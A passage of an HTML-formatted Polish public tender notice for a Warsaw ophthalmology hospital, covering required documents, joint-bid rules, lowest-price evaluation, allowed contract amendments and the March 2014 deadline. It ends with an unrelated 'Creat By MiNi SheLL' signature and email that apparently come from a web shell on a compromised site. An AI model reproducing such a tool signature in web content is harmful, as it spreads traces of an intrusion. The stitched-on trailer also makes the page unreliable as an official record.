III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wymagania praktyczne wobec Wykonawcy - wypełniony i  podpisany załącznik nr 3 do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wymagania jakie musi spełniać oferta składana przez dwa lub więcej podmiotów   
    ubiegających się wspólnie o udzielenie zamówienia (np. konsorcja, spółki cywilne):
1) w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców  
występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na  
podstawie art. 24 ust. 1 ustawy PZP;
2) wymagania określone na podstawie art.22 ust.1 muszą zostać wykazane wspólnie przez wykonawców składających ofertę wspólną. 
3) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich  
Wykonawców występujących wspólnie;
4) Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich  
w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego;
5) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem  
występującym jako reprezentant pozostałych.
2. W zakresie nie uregulowanym SIWZ, zastosowanie mają przepisy Rozporządzenia Prezesa  
  Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może 
  żądać Zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane  

3. Inne dokumenty, które należy dołączyć do oferty:
    Wzór umowy zawierający adnotację -akceptuję- oraz pieczątkę imienną i podpis     
   uprawnionego przedstawiciela wykonawcy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany i uzupełnienia niniejszej umowy, w tym załączników, mogą nastąpić pod 
    rygorem nieważności, jedynie w formie pisemnej na podstawie aneksu podpisanego przez  
    każdą ze stron  z zastrzeżeniem ust. 2. 
  2. Zmiany w umowie mogą być dokonane tylko przy zaistnieniu okoliczności, o których  mowa  
      w § 4 ust.10 , oraz  w następujących przypadkach:
              1) jeżeli z powodu nadzwyczajnej zmiany stosunków spełnienie świadczenia byłoby    
        połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą, a w     
        szczególności w przypadku wystąpienia gwałtownej dekoniunktury,
2)	jeżeli z powodu okoliczności niezawinionych przez żadną ze stron wykonanie      
    przedmiotu umowy w terminie określonym umową, jest niemożliwe lub znacznie  
    utrudnione;
3)	zmiany stanu prawnego którejkolwiek ze stron, niezależnego od jej woli.
4) w przypadku wszelkich zmian związanych z organizacją pracy Wykonawcy np. prowadzenia dokumentacji, modyfikacji usług itp.
5) w przypadku zmiany zakresu urządzeń  objętych niniejszą umową.
6) w przypadku zmian w składzie osobowym pracowników Wykonawcy, realizującym  
      zamówienie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spkso.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Kliniczny Szpital Okulistyczny w Warszawie (03-709) ul. Józefa Sierakowskiego 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.03.2014 godzina 10:00, miejsce: Samodzielny Publiczny Kliniczny Szpital Okulistyczny w Warszawie (03-709) ul. Józefa Sierakowskiego 13 - Kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com